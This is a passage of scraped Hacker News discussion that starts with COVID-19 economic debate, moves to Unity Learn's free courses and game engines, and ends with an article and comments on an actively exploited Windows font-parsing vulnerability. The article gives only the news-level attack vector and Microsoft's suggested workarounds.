The third option is to keep people at their residences but either pay them or reduce their bills / mortgages etc. to 0 while COVID-19 blows over. But that could take 2-18 months. It was hard enough getting $1200 once for every American household - I doubt it will continue for another 18 months until a vaccine is developed.

qqssccfftt(10000) 2 days ago [-]

'How many people are we willing to kill to keep the economy moving?'

standardUser(10000) 2 days ago [-]

Most wealthy nations already have a robust social safety net in place. They don't need to rush to cobble together a temporary one in the same way the US does.

danans(3411) 2 days ago [-]

This boils down to the reality that governments can take measures to mitigate the economic damage caused by an idled labor force (direct payments to workers), but can do very little to mitigate the economic damage caused by a sick or dying labor force.

tuna-piano(3984) 1 day ago [-]

I think this is a false choice.

As Bill Gates said, we can't say: 'Hey, keep going to restaurants, go buy new houses, ignore that pile of bodies over in the corner. We want you to keep spending because there's maybe a politician who thinks GDP growth is all that counts.'

The truth is that it seems our choice is relatively simple:

1) Allow the virus to spread rapidly, overload the health system, kill many people, until herd immunity is reached.

2) Do partial shutdown measures and some partial efforts at testing and contact tracing, let the virus continue for a long time, and more slowly reach option 1.

3) Do strong shutdown measures until the virus can be controlled by a strong testing and contact-tracing regime.

Iran (seems to have?) chosen option 1.

Italy started with option 2, and will hopefully move into option 3.

Option 3 is the only acceptable option that doesn't destroy the economy and health systems.

Unchecked, 10 cases of this virus will turn into 100s of thousands. That is the same with 10 cases in March, or 10 cases in May or 10 cases in any month.

loopz(10000) 2 days ago [-]

Each country has economic and market mitigations. Some are beginning to copy the US model of the government paying bills outright for a period. If everyone can do this at low cost, there's no reason to accept high risk and damage to the economy later. This incident will make us learn fast.

The medical experts do consider economic and market impacts, and governments are working out how to balance everything. However, since this is an unprecedented health crisis with unknown ramifications, that is the first priority. Many measures are there to create wiggle room to handle whatever unknown unknowns may come down the road.

This shows us systemic vulnerabilities, and societies will be forever changed, probably for the better.

mrfusion(700) 2 days ago [-]

And mental health too. How many new alcoholics will this create? How many suicides?

smileysteve(10000) 2 days ago [-]

> the US is the only country that's seriously discussing economic repercussions and debating the medical experts

The only nation with a leader who promotes a 15-day plan and says the cure can't be worse than the disease 8 days in. It demonstrates a severe lack of resolve.

scottLobster(10000) 2 days ago [-]

We won't know for sure until April 3 (the day the BLS releases the official unemployment rate for March), but this may very well trip the Sahm recession indicator, which has correctly predicted/detected every US recession back to 1950 (if it's been backfitted further than that, I can't find the data).

https://fred.stlouisfed.org/series/SAHMCURRENT
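
For reference, the Sahm rule is mechanically simple: take the 3-month moving average of the national unemployment rate and subtract its minimum over the previous 12 months; a reading of 0.50 percentage points or more signals a recession. A minimal C# sketch (assuming a monthly unemployment-rate series, most recent value last):

    using System;

    static class SahmRule
    {
        // Returns the indicator in percentage points; needs at least 15 months of data.
        public static double Indicator(double[] monthlyRate)
        {
            int n = monthlyRate.Length;
            double Avg3(int end) =>
                (monthlyRate[end] + monthlyRate[end - 1] + monthlyRate[end - 2]) / 3.0;

            double current = Avg3(n - 1);               // 3-month average ending this month
            double min = double.MaxValue;
            for (int end = n - 13; end <= n - 2; end++) // the 12 prior 3-month averages
                min = Math.Min(min, Avg3(end));
            return current - min;                       // >= 0.50 signals recession
        }
    }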

yread(253) 2 days ago [-]

I don't think you need a black magic/AI/fancy algorithm to tell whether there is a recession or not

donquichotte(3836) 2 days ago [-]

The economic impact of COVID-19 on people's lives will be far more severe than the biological one.

Hopefully this won't discourage governments from taking appropriate action once a more lethal pandemic comes.

johnpowell(4332) 2 days ago [-]

So let's say there are a couple hundred thousand dead and you are pretty sure that 50% of the people out there have it. Are you going to go out for dinner or a movie? Not me.

But ignore me if you aren't saying the restrictions should be reversed so the economy goes back to normal. A guy on CNBC just said we should do that even if it means 400K would die. The economy just will not go back to normal anytime soon.

hopfog(4295) 2 days ago [-]

Just to illustrate how absurd this number is: https://pbs.twimg.com/media/EUCTISVXQAcIKEb?format=png&name=...

trackone(10000) 2 days ago [-]

This is messing up charts so much that maybe in a couple of years we will be removing 2020 from the data just to have a chart that doesn't have a crazy scale.

dwaltrip(10000) 1 day ago [-]

Holy shit... That is absolutely nuts. And to think it will likely get worse.





Historical Discussions: Unity Learn platform free for three months (March 25, 2020: 497 points)
Learn Unity Premium is now free (March 22, 2020: 1 points)
Design, Develop, and Deploy for VR – Unity Learn (November 14, 2019: 1 points)

(498) Unity Learn platform free for three months

498 points 3 days ago by metreo in 10000th position

learn.unity.com | Estimated reading time – 2 minutes | comments | anchor

Create with Code Live

Register for the live classes now: 9 am PT series or 5 pm PT series. Come back here to follow along with the course materials and track your progress. You should receive instructions by email to join the webinar, or use these direct links to the Zoom sessions: Join Live M-F 9 am PT, Join Live M-F 5 pm PT.

Create with Code is one of our most popular courses, making learning to code fun by building your own games from scratch in C#. Starting on Monday, March 23, 2020, we are hosting a virtual Create with Code Live series open to students, teachers, and anyone else interested in learning to code. Each weekday from March 23 to May 8, Unity will host an hour-long virtual class with live Q&A at 9 am and 5 pm PT. Morning and afternoon sessions will cover the same content; choose the time that fits your schedule, or register for both. Sessions will be recorded and posted in these course pages for those who are unable to attend live. To join the 9 am PT live classes, register here. To join the 5 pm PT live classes, register here.

Between classes, there will be up to 30 minutes of independent work. By the end of this course, you will have foundational skills in Unity, C# computer programming, game design, and development. For students, we recommend applying for the Unity Student plan to make the most of Unity, but this is not required for participation in Create with Code Live. To get set up for the course, please install Unity. The Create with Code curriculum is aligned to ISTE Standards for computer science education.
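
To give a flavor of the level such a course starts at, a first lesson typically builds a tiny C# MonoBehaviour along these lines (an illustrative sketch, not taken from the course materials; the class name and speed value are arbitrary, and "Horizontal" is Unity's default input axis):

    using UnityEngine;

    // Attach to a GameObject: moves it left/right with the horizontal input axis.
    public class PlayerController : MonoBehaviour
    {
        public float speed = 10f; // units per second, tunable in the Inspector

        void Update()
        {
            float horizontal = Input.GetAxis("Horizontal"); // -1..1 from keys/stick
            transform.Translate(Vector3.right * horizontal * speed * Time.deltaTime);
        }
    }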




All Comments: [-] | anchor

gentleman11(10000) 3 days ago [-]

If Unreal or CryEngine made the effort to create better learning resources like Unity does, they would grow dramatically. Finding the name of a function I need in the C++ API is a research project involving a dive through years of old forum posts.

ThrowawayR2(10000) 3 days ago [-]

Isn't Unreal already the dominant engine for AAA games?

eps(3377) 3 days ago [-]

I was looking at getting it for my kids just last week. I went through a bunch of forums, reading what people were saying, and the overwhelming tone was that it's just not good: an ad-hoc collection of tutorials with no overall structure that are more confusing than helpful. Too complicated for noobs, too trivial for those with a bit of experience.

If anyone has a firsthand experience with Unity Learn, I'd love to hear about it, and I'm sure others will find it useful too.

sidlls(10000) 3 days ago [-]

An ad-hoc collection of tutorials with no overall structure that are more confusing than helpful

This is how I feel about most open source software documentation and tutorials/articles about library or software usage.

armatav(4133) 3 days ago [-]

Out of all the online courses, I would say they have the most fun/engaging content. It kind of makes sense too.

laegooose(10000) 3 days ago [-]

I went through a bunch of Unity courses. Wrote about the best one here https://news.ycombinator.com/item?id=22688437

In fact, it was my best experience among online courses on any subject.

enjoiful(10000) 3 days ago [-]

Check out Dreams for PS4. It's perfect for creating games with kids.

metreo(10000) 3 days ago [-]

I'm doing a relatively short course right now on optimization, which is instructive. Profiling is an important but strangely ad hoc task, so I'm always looking for fresh content on the subject.

mrfusion(700) 3 days ago [-]

Would this teach me to develop for the Oculus Quest?

I have some locomotion ideas I want to try out, but I don't know where to start.

zmmmmm(10000) 2 days ago [-]

I'm in the same boat - I think the Quest has amazing potential as a platform, and would love to know more about how to get started with development for it.

jmckib(10000) 3 days ago [-]

Most of the development you'd do for Oculus is 90% the same as what you'd do for any other game, so I'd say yes, but you'll need to supplement with tutorials specifically for Oculus/Unity.

Impossible(242) 2 days ago [-]

Oculus and Unity released a course for VR development that will teach you the basics of developing for Quest https://learn.unity.com/course/oculus-vr

cachvico(10000) 2 days ago [-]

Yes - Unity supports the Quest (through Link mode). You can check out the XR Interaction Toolkit [1] for an easy way to get going with teleport locomotion.

[1] https://docs.unity3d.com/Packages/com.unity.xr.interaction.t...

k__(3378) 3 days ago [-]

Is there something like Unity out there but with JavaScript support?

I know a bunch of JS game engines, but they all lack tooling.

mattigames(3985) 3 days ago [-]

C# is not that different from JavaScript, but maybe I'm biased. If you still want an easier path than C#, I would recommend Unity plugins that let you create games without coding, such as Playmaker [0] and Bolt [1]; after getting comfortable with those, you will be more ready to use C#.

[0] https://assetstore.unity.com/packages/tools/visual-scripting...

[1] https://assetstore.unity.com/packages/tools/visual-scripting...

kerng(2022) 3 days ago [-]

Switching to C# is straightforward - for the majority of projects you won't need many language-specific features. Most operations come down to incrementing counters, handling if and switch branches, some event messaging, and doing math and state tracking. C# is quite a good choice for those things.
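
To illustrate how small the jump is, here's a hedged sketch of everyday C# of that kind, with rough JavaScript equivalents in comments (the class and member names are invented for the example):

    using System;

    class ScoreKeeper
    {
        public event Action<int> ScoreChanged;  // ~ an EventEmitter subscription in JS
        int score;                              // let score = 0;

        public void Add(int points)
        {
            score += points;                    // score += points;
            switch (score)                      // switch reads the same as in JS
            {
                case 100: Console.WriteLine("century!"); break;
                default:  Console.WriteLine($"score: {score}"); break;
            }
            ScoreChanged?.Invoke(score);        // ~ emitter.emit('score', score)
        }
    }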

pjmlp(200) 3 days ago [-]

Yes, the best engine in that regard is PlayCanvas,

https://playcanvas.com/

gentleman11(10000) 3 days ago [-]

Three.js has very little tooling, but it is a pleasure to work with if your project is simple. Babylon.js also looks promising.

Finally, old versions of Unity had some JS support (UnityScript). You could maybe track down one of them, but the support was eventually removed.

tomc1985(10000) 3 days ago [-]

Just learn C#, why stick to JS?

heyitsguay(10000) 3 days ago [-]

Unity has JavaScript support, and can target WebGL for its builds.

Cpoll(10000) 3 days ago [-]

Phaser might fit the bill.

DonHopkins(3291) 3 days ago [-]

I've been developing UnityJS for scripting and integrating Unity3D with JavaScript, which works very well not only on the WebGL platform, but also on iOS, Android, and desktop. It's a work in progress, so it's low on tooling and documentation right now, but I've been using it successfully for quite some time for a lot of different things, and making a lot of progress towards modularizing it, documenting it, and making it easier for other people to use. Please contact me if you're interested!

https://news.ycombinator.com/item?id=19804242

Email: [email protected]

Goals:

Developing and applying UnityJS, an open source Unity3D C#/JavaScript bridge for rapidly developing and deploying dynamically extensible cross platform Unity3D apps programmed in JavaScript, and efficiently integrating Unity3D with off-the-shelf and bespoke web technologies and services.

Seeking to collaborate with people who can see and benefit from the obvious and subtle applications to rapid prototyping, exploratory iterative development, interactive debugging, live programming, deeply integrating web technologies and JSON with Unity3D, scriptable VR and AR platforms, and delivering open-ended extensible 3D browser-like applications on WebGL, mobile and desktop platforms.

I've been developing and supporting the open source UnityJS core by integrating both popular free Unity and JavaScript libraries (i.e. JSONDotNet, LeanTween, TextMesh Pro, UnityGLTF, SocketIO networking, Ace code editor, d3 visualization library, etc) and proprietary libraries and extensions (i.e. JauntVR SDK, MapBox SDK, your own SDK, or bespoke code that I develop), so they can all be easily and efficiently scripted and orchestrated together in JavaScript.

So far I've applied UnityJS to JauntVR's panoramic VR video player on Android, WovenAR's scriptable AR platform on iOS, and ReasonStreet's interactive financial data driven visualization system on WebGL, and I'm looking for other interesting people to work with on exciting and fitting applications for UnityJS!

https://github.com/SimHacker/UnityJS

https://github.com/SimHacker/UnityJS/blob/master/doc/Anatomy...

Here are some other things I've written about it on HN (in chronological order):

https://news.ycombinator.com/item?id=17309132

https://news.ycombinator.com/item?id=17384078

https://news.ycombinator.com/item?id=18171571

https://news.ycombinator.com/item?id=18860467

https://news.ycombinator.com/item?id=19748582

https://news.ycombinator.com/item?id=20313751

https://news.ycombinator.com/item?id=20744552

https://news.ycombinator.com/item?id=21932462

https://news.ycombinator.com/item?id=21932984

TomGullen(3990) 3 days ago [-]

Our tool Construct 3 runs in the browser, and has no-programming-required event blocks as well as JavaScript support:

https://www.construct.net/en

A mix of events/JavaScript in its simplest form looks like:

https://s1.construct.net/images/v777/refresh/features/learn-...

Documentation for Javascript in Construct 3 can be found here:

https://www.construct.net/en/make-games/manuals/construct-3/...

We're doing special offers for education due to the pandemic:

https://www.construct.net/en/education-support

A key feature for schools is granting access to Construct 3's full features with access codes, meaning students do not need to provide us with any login details/emails etc., which is popular with educational institutions:

https://www.construct.net/en/make-games/education/licensing

PinkMilkshake(4082) 2 days ago [-]

BabylonJS has an official, Unity-like editor that runs in the browser: https://github.com/BabylonJS/Editor

antsoul(10000) 3 days ago [-]

Godot 4.0, with Vulkan support, will replace Unity really quickly.

andybak(2129) 3 days ago [-]

What makes you say that? Other than a belief in open source and a sense of optimism?

Do you have a firm grasp on the weaknesses and gaps in Unity as well as its strengths? Would you say you have a clear understanding of the breadth of its features and how much they matter to its primary markets?

I'd love you to be right but you'll need to do more to convince me that you have some special insight in this matter.

dilap(3412) 3 days ago [-]

Right after Linux on the Desktop finally hits it big.

pjmlp(200) 3 days ago [-]

No it won't, because it doesn't have GUI tooling at the same level, an optimizing AOT compiler for .NET, the ability to write engine pipeline stages in .NET (DOTS), the quantity of items in the asset store, or the sponsorship from Nintendo/Google/Microsoft; and most importantly, it isn't part of the curriculum at many top-level game design schools.

It is still a nice engine for small teams though.

jayd16(10000) 2 days ago [-]

I really doubt it. Maybe one day but certainly not 'quickly' and especially not just from Vulkan.

I want to like Godot, but it feels like it's making the same mistakes Unity 5.x and earlier did, with fixed shader and script languages that just aren't as useful as the languages they're abstracting. I want to use GLSL or Vulkan or DX12, not a custom language that will get in my way. It's a C++ engine that uses script runtimes, like Unity did. This makes it hard to optimize across languages, and is why Unity went down the whole IL2CPP path. Now Unity is moving more and more features into C#, with a custom C# compiler to better optimize with user code. Godot will have to succeed where Unity could not.

Godot looks very promising, but if you don't think it's an uphill battle, or if you think Unity is easy to beat, you're mistaken.

BHSPitMonkey(4333) 2 days ago [-]

As long as the gaming hardware giants (consoles and VR) continue partnering closely with Unity and Unreal and giving those engines several months of lead over open-source engines when it comes to platform support... no, it will not.

brianjerez(10000) 3 days ago [-]

Perhaps this is not the place to ask, but besides Unity, which other companies are offering free MOOCs and/or video tutorials because of COVID-19?

JCoder58(10000) 3 days ago [-]

Epic Games has offered numerous free courses about Unreal Engine 4. Both game-related and industry-related courses are available.

https://www.unrealengine.com/en-US/onlinelearning-courses

BrianHenryIE(10000) 2 days ago [-]

Udacity have one month free.

maroonblazer(4154) 3 days ago [-]

Not a MOOC or video, but a number of Minecraft creators have generously made their educational content free until June.

Disclosure: I'm a part of the Minecraft team.

https://www.minecraft.net/en-us/article/free-educational-con...

laegooose(10000) 3 days ago [-]

[1] is the single best online course I've taken. It took ~30 hours to complete, and we all know how easy it is to drop a course after a couple of sessions.

It teaches from the very basics; at the same time, the projects are diverse and fun, because 3D assets and effects are provided.

The chunk size is perfect: a few minutes of video and then a few minutes of work in the editor. Videos have short text summaries, so there's no need to rewind the video if I missed something.

Often it solves a problem in a naive but incorrect way, and then fixes it. So when I encounter a problem in a real project, I often have experience dealing with it.

It has debugging projects, where you get a complete project that is broken in multiple ways. So smart. In my regular programming work I spend most of my time debugging, not creating from scratch.

The narrator (Carl D.) is charismatic, videos are very professional.

I wish there were more courses with same structure and quality. Can't recommend it enough.

[1] https://learn.unity.com/course/create-with-code

DevKoala(4133) 2 days ago [-]

I also cannot recommend this course enough. I learned Unity basics over the winter break thanks to it. I am very comfortable prototyping now.

metreo(10000) 3 days ago [-]

I don't think that course is even premium content.

JshWright(3675) 3 days ago [-]

> The narrator (Carl D.) is charismatic

I just watched the intro video, it seemed like he was yelling the whole time...

enjoiful(10000) 3 days ago [-]

I would highly recommend learning Dreams for PS4. It is going to change the way video games are made, and it provides a fun, accessible way to get into game creation. I would have killed to have Dreams when I was 12 years old.

Look up all the amazing things that can be made with this engine. It's incredible!

travbrack(10000) 2 days ago [-]

No PC version though sadly.





Historical Discussions: Windows code-execution zeroday is under active exploit, Microsoft warns (March 23, 2020: 488 points)

(488) Windows code-execution zeroday is under active exploit, Microsoft warns

488 points 5 days ago by vo2maxer in 276th position

arstechnica.com | Estimated reading time – 4 minutes | comments | anchor

Attackers are actively exploiting a Windows zero-day vulnerability that can execute malicious code on fully updated systems, Microsoft warned on Monday.

The font-parsing remote code-execution vulnerability is being used in "limited targeted attacks" against Windows 7 systems, the software maker said in an advisory published on Monday morning. The security flaw exists in the Adobe Type Manager Library, a Windows DLL file that a wide variety of apps use to manage and render fonts available from Adobe Systems. The vulnerability consists of two code-execution flaws that can be triggered by the improper handling of maliciously crafted master fonts in the Adobe Type 1 PostScript format. Attackers can exploit them by convincing a target to open a booby-trapped document or view it in the Windows preview pane.

"Microsoft is aware of limited, targeted attacks that attempt to leverage this vulnerability," Monday's advisory warned. Elsewhere the advisory said: "For systems running supported versions of Windows 10 a successful attack could only result in code execution within an AppContainer sandbox context with limited privileges and capabilities."

Microsoft didn't say if the exploits are successfully executing malicious payloads or simply attempting it. Frequently, security defenses built into Windows prevent exploits from working as hackers intended. The advisory also made no reference to the volume or geographic locations of exploits. A fix is not yet available, and Monday's advisory provided no indication when one would ship.

What to do now?

Until a patch becomes available, Microsoft is suggesting users of non-Windows 10 systems use one or more of the following workarounds:

  • Disabling the Preview Pane and Details Pane in Windows Explorer
  • Disabling the WebClient service
  • Renaming ATMFD.DLL (on Windows 10 systems that have a file by that name), or alternatively, disabling the file from the registry

The first measure will prevent Windows Explorer, a tool that provides a graphical user interface for displaying and managing Windows resources, from automatically displaying OpenType fonts. While this stopgap fix will prevent some types of attacks, it won't stop a local, authenticated user from running a specially crafted program to exploit the vulnerability.

The second workaround—disabling the WebClient service—blocks the vector attackers would most likely use to wage remote exploits. Even with this measure in place, it's still possible for remote attackers to run programs located on the targeted user's computer or local network. Still, the workaround will cause users to be prompted for confirmation before opening arbitrary programs from the Internet.

Microsoft said that disabling the WebClient will prevent Web Distributed Authoring and Versioning requests from being transmitted. It also stops any services that explicitly depend on the WebClient from starting and logs error messages in the System log.

Renaming ATMFD.DLL, the last recommended stopgap, will cause display problems for applications that rely on embedded fonts and could cause some apps to stop working if they use OpenType fonts. Microsoft also cautioned that mistakes in making registry changes to Windows—as required in one variation of the third workaround—can cause serious problems that may require Windows to be completely reinstalled. The DLL file is no longer present in Windows 10 version 1709 and higher.

Monday's advisory provides detailed instructions for both turning on and turning off all three workarounds. Enhanced Security Configuration, which is on by default on Windows Servers, doesn't mitigate the vulnerability, the advisory added.

Targeted... for now

The phrase "limited targeted attacks" is frequently shorthand for exploits carried out by hackers carrying out espionage operations on behalf of governments. These types of attacks are usually limited to a small number of targets—in some cases, fewer than a dozen—who work in a specific environment that's of interest to the government sponsoring the hackers.

While Windows users at large may not be targeted initially, new campaigns sometimes sweep larger and larger numbers of targets once awareness of the underlying vulnerabilities becomes more widespread. At a minimum, all Windows users should monitor this advisory, be on the lookout for suspicious requests to view untrusted documents, and install a patch once it becomes available. Windows users may also want to follow one or more of the workarounds but only after considering the potential risks and benefits of doing so.




All Comments: [-] | anchor

greggman3(10000) 4 days ago [-]

I really wish (and hope) that Microsoft is working on a brand new OS with a VM-like thing for running legacy stuff (like Apple did going from OS 9 to OS X).

They really do need to start over from scratch: get rid of all the cruft, design the APIs not to suck, and design in security, permissions, and sandboxing from the beginning. Make rootkits and other spyware much harder. Get rid of installation scripts (more like iOS/Android/some Mac apps) and a million other things.

I don't hate Windows, but I hate that every app I install, including every game from Steam or the Oculus Store or Humble Bundle, can basically own my machine.

zvrba(3901) 4 days ago [-]

> They really do need to start over from scratch, get rid of all the cruft, design the APIs not to suck, design in security, permissions, and sandboxing from the beginning.

The security model is still better than what POSIX provides. As for sandboxing: 'For systems running supported versions of Windows 10 a successful attack could only result in code execution within an AppContainer sandbox context with limited privileges and capabilities.' From https://portal.msrc.microsoft.com/en-us/security-guidance/ad...

jfkebwjsbx(10000) 4 days ago [-]

They don't need to get rid of anything, and in fact they cannot. People want their current stuff.

What they can add is sandboxed apps with a virtual filesystem and whatnot.

But they do not want to spend the manpower to do so, it seems.

MikusR(260) 4 days ago [-]

Windows 10X is exactly that.

contextfree(4313) 2 days ago [-]

These were/are basically the goals of UWP and Windows Core/10X.

ChrisSD(4203) 5 days ago [-]

> For systems running supported versions of Windows 10 a successful attack could only result in code execution within an AppContainer sandbox context with limited privileges and capabilities.

Which is still not good but not as bad as it could be.

saagarjha(10000) 5 days ago [-]

Isn't this code running in Windows Explorer? That sounds like it could potentially be pretty bad.

topspin(4224) 4 days ago [-]

> Which is still not good but not as bad as it could be.

Not great, not terrible.

...sorry

llcoolv(10000) 5 days ago [-]

Why people still use this 'OS' is beyond me.

tbezman(10000) 5 days ago [-]

gaming

jlgaddis(3000) 4 days ago [-]

Really?

I've never used Windows 10 and it's been years since I had a Windows machine on my desk but is it really that difficult to imagine and/or understand why ~90% of the world's PCs run Windows?

miohtama(3341) 5 days ago [-]

It says Adobe... So there is a component from Adobe in core Windows? Or does the DLL come with a PDF reader installation?

gruez(3847) 5 days ago [-]

>So there is a component from Adobe in the core windows

Doesn't seem to be. The file (ATMFD.DLL) doesn't exist in a fresh install of Windows 10 1909 enterprise.

kevingadd(3907) 5 days ago [-]

It's an Adobe component in Windows that handles fonts, because Adobe controls/controlled a big part of the font ecosystem. At this point I believe the Windows team controls it and can make changes to it, but it's definitely supporting Adobe file formats.

calibas(10000) 5 days ago [-]

It's needed for displaying Postscript Type 1 fonts. I believe Adobe owns the licensing for everything but it's up to Microsoft to update the Windows 10 DLL.

voldacar(4336) 4 days ago [-]

Why should a kernel even have the slightest idea what a font is? This is absurd.

wolfi1(4217) 5 days ago [-]

MS should consider including the FreeType library instead of Adobe's Type Manager.

jfk13(2957) 5 days ago [-]

The new(ish) CFF renderer in FreeType also comes from Adobe. I don't know whether it shares any code with what's in ATM, and if so, whether any vulnerability might be applicable to both, but it might be interesting for someone knowledgeable to investigate.

Tempest1981(4254) 5 days ago [-]

Someone posted this comment in the arstechnica article:

To be clear and despite its name, this is not Adobe code. Microsoft was given the source code for ATM Light for inclusion in Windows 2000/XP. After that, Microsoft took 100% responsibility for maintaining the code.

Microsoft has added additional code and removed code from that DLL (they shove all their Type 1 handling and OpenType font format handling into that one DLL).

hackersword(10000) 5 days ago [-]

Where is ATMFD.DLL ?

I am not seeing it at c:\windows\system32\ATMFD.DLL on multiple different Windows 10 machines I've checked.

unnouinceput(10000) 5 days ago [-]

This is a mistake in the article. atmfd.dll is for older versions of Windows; Windows 10 has it under the name ATMLIB.DLL.

Search for that one instead and rename it.

glofish(10000) 5 days ago [-]

No patch is available, but one of the recommended mitigations is to:

  Rename ATMFD.DLL
Would it be possible to have a patch that renames this file for me, if that is indeed a desirable and workable solution?
rkagerer(4201) 5 days ago [-]

In the meantime:

    Right-click C:\Windows\System32\atmfd.dll
    Properties | Security | Advanced | Owner, take ownership.
    Close dialogs, go back in and give yourself Full Control.
Now you can rename the file.
pas(10000) 4 days ago [-]

Win10 is supposed to be evergreen, aggressively auto-updating, etc., so how come there are years-old versions around!?

(Win10 1703+, which came out years ago, already does not use this DLL.)

lexicality(10000) 4 days ago [-]

Because idiots do everything they possibly can to stop their OS from updating.

jfkebwjsbx(10000) 4 days ago [-]

Evergreen? There is not much new in Windows 10, everything is based on the previous version.

EmilioMartinez(10000) 4 days ago [-]

What is a good way to keep up with active vulnerabilities and zero-days?

alyandon(10000) 4 days ago [-]

Requires a Microsoft account but I subscribe to their email lists.

https://www.microsoft.com/en-us/msrc/technical-security-noti...

jliptzin(4143) 5 days ago [-]

When has someone ever thought there wasn't a Windows zeroday under active exploit?

nabakin(10000) 5 days ago [-]

No one. They are adding emphasis.

robocat(4320) 5 days ago [-]

Some additional points from https://www.itnews.com.au/news/new-remote-code-execution-win...

* Attackers can exploit the vulnerability by embedding Type 1 fonts into documents and convincing users to open them

* The vulnerability lies in the Windows Adobe Type Manager Library, ATMFD.DLL

* Disabling the Windows WebClient service blocks what Microsoft says is the most likely remote attack vector, the Web Distributed Authoring and Versioning (WebDAV) client service

* Local, authenticated users can run malicious programs that exploit the vulnerability (I presume this is a privilege escalation)

afrcnc(4247) 4 days ago [-]

or you can link to the actual MSFT advisory instead of all these articles rewording the same thing: https://portal.msrc.microsoft.com/en-US/security-guidance/ad...

peter_d_sherman(262) 4 days ago [-]

I've always wondered why fonts are rendered programmatically...

Usually, font renderers are Turing complete in some way, and usually this opens up security concerns, and rightfully so...

One of the primary reasons why fonts are rendered programmatically is because there's a theoretically infinite set of sizes/styles that might be required...

Well... why not make fonts with glyphs that are say, 5000 x 5000 pixels... and then instead of rendering for a particular size, line by line, stroke by stroke, curve by curve, why not instead use an interpolation algorithm to shrink that 5000 x 5000 pixel glyph to the exact size you want?

If a font provider program were made to operate that way, then all that would be needed to audit the program for security would be to audit the shrinking/interpolation algorithm -- which could be as simple as possible (it's just a function which shrinks a bitmap of size A to another bitmap of size B... not a Turing machine which ingests other programs...)

Yes, fonts would consume much more memory (I suppose they could be compressed), but doing things that way might make font-providing programs more secure. And yes, you'd need to provide extra glyphs for italic, bold, bold italic, etc. (much more memory), but you'd be making a trade-off for a simple, security auditable font-provider... (we assume it's open-source...)
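
For what it's worth, the shrink step proposed above really can be a small, auditable function. Here is a minimal box-filter downscale sketch in C, assuming 8-bit grayscale glyph bitmaps (illustrative only, not taken from any font engine):

    #include <stdint.h>
    #include <stddef.h>

    /* Shrink an 8-bit grayscale glyph from sw x sh to dw x dh (dw <= sw,
     * dh <= sh) by averaging the source rectangle each destination pixel
     * covers. No interpreter, no font program: just arithmetic on pixels. */
    void shrink_glyph(const uint8_t *src, size_t sw, size_t sh,
                      uint8_t *dst, size_t dw, size_t dh)
    {
        for (size_t y = 0; y < dh; y++) {
            for (size_t x = 0; x < dw; x++) {
                /* Source rectangle covered by this destination pixel */
                size_t x0 = x * sw / dw, x1 = (x + 1) * sw / dw;
                size_t y0 = y * sh / dh, y1 = (y + 1) * sh / dh;
                uint32_t sum = 0, n = 0;
                for (size_t sy = y0; sy < y1; sy++)
                    for (size_t sx = x0; sx < x1; sx++) {
                        sum += src[sy * sw + sx];
                        n++;
                    }
                dst[y * dw + x] = n ? (uint8_t)(sum / n) : 0;
            }
        }
    }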

dvhh(4282) 4 days ago [-]

Fonts do have other features that are not much used in the programming/tech world.

One example would be support for ligatures, which can be a lot more complex depending on the language you want to support.

And depending on the rendering speed you want, you might want to perform some JIT compilation, which unfortunately might not cover all edge cases.

virgilp(10000) 4 days ago [-]

You're also forgetting things like ligatures. And, how would you even render your proposed fonts in embedded devices? The solution is not 'huge bitmaps'.

EmilioMartinez(10000) 4 days ago [-]

For starters, small characters are not just sized-down versions of large characters. Ligatures et al further complicate things. When you actually try to deal with font management and image quality you'll realize why they went through the trouble of making it so.

jstimpfle(3752) 4 days ago [-]

Font rendering is a dark art at common resolutions of ~96dpi. These displays are not really suited to display resizable fonts (as opposed to hand-crafted bitmap fonts). To render half-way readable fonts at ~96dpi you cannot just pre-render at an extremely high resolution and then downsize using a generic algorithm. (Even ignoring the unacceptable cost). To the best of my knowledge most fonts are only readable at 96dpi because glyphs have manually picked control points to make sure that certain delicate points are aligned to the pixel grid.

jchw(4332) 4 days ago [-]

Well if you just want static vector fonts alone you don't need anything programmatic; vector images are not inherently code any more than raster ones are. For TrueType I'm pretty sure the VM is only for hinting. OpenType has more flexibility, but I haven't anecdotally seen many vulnerabilities around OpenType. I suspect Type 1 is the subject of many vulnerabilities specifically because it's old code that doesn't get as much usage.

jonas21(1632) 4 days ago [-]

Well, for starters, there's kerning [1], hinting [2] and subpixel rendering [3] so that your text stays legible, even at small sizes.

Then, if you want to support a variety of languages, you need to handle diacritics, ligatures, contextual shaping, and bidirectional text [4]. A character's appearance can vary based on what comes before and after it. Or the base character can change appearance depending on the diacritics that are added to it. Some languages have complex rules about how you combine things, for example Thai [5].

If you want to support Emoji (and of course you do), then there's things like skin tone modifiers [6] and the zero-width joiner [7] that lets you make all kinds of crazy combinations.

Modern text rendering is, for better or worse, very complex.

[1] https://en.wikipedia.org/wiki/Kerning

[2] https://en.wikipedia.org/wiki/Font_hinting

[3] https://en.wikipedia.org/wiki/Subpixel_rendering

[4] http://scripts.sil.org/cms/scripts/page.php?site_id=nrsi&ite...

[5] https://www.unicode.org/L2/L2018/18216-thai-order.pdf

[6] http://www.unicode.org/reports/tr51/tr51-16.html#Emoji_Modif...

[7] http://www.unicode.org/reports/tr51/tr51-16.html#Emoji_ZWJ_S...

pcwalton(3006) 4 days ago [-]

> Well... why not make fonts with glyphs that are say, 5000 x 5000 pixels... and then instead of rendering for a particular size, line by line, stroke by stroke, curve by curve, why not instead use an interpolation algorithm to shrink that 5000 x 5000 pixel glyph to the exact size you want?

TrueType doesn't need a virtual machine to parse the vectors either, only to hint. Your proposal doesn't provide any hinting capability, so it doesn't solve the problems the VMs were created to solve. Moveto/lineto/curveto commands like TrueType uses are trivial and are not causing the issues here.

Fonts are going to be complex no matter what, largely because of international text and advanced typographic features. The real solution is to move to memory-safe implementations.

peter_d_sherman(262) 4 days ago [-]

A bunch of interesting comments, to be sure.

All I know is, the fonts (in ROM) in the original IBM-PC, or the Apple ][, or the C-64, or the Atari 800, or any other of the 64K computers of the 1980's -- never had a security issue with their (ROM bitmap) fonts.

That, and:

I challenge all of the naysayers to come up with a better solution than the one I have proposed...

Not all font-renderer/language experts, here, are we?

Neither am I.

That's the whole point.

A graphical shrink routine I can easily audit for security holes.

A font description language (an entire language mind you!) with lots of nuances -- how is any normal human being (much less rockstar programmer) supposed to audit one of those, with all of its possibilities, for security holes, in a single human lifetime?

We've seen some very subtle manipulation of these (evinced by this article), whether intentional or not...

A simple graphical shrink routine -- is orders of magnitudes more transparent and auditable than font description languages, or their interpreters...

You want a better solution?

Come up with one and tell me what it is!

I'm listening...

monadic2(10000) 4 days ago [-]

> Usually, font renderers are Turing complete in some way, and usually this opens up security concerns, and rightfully so...

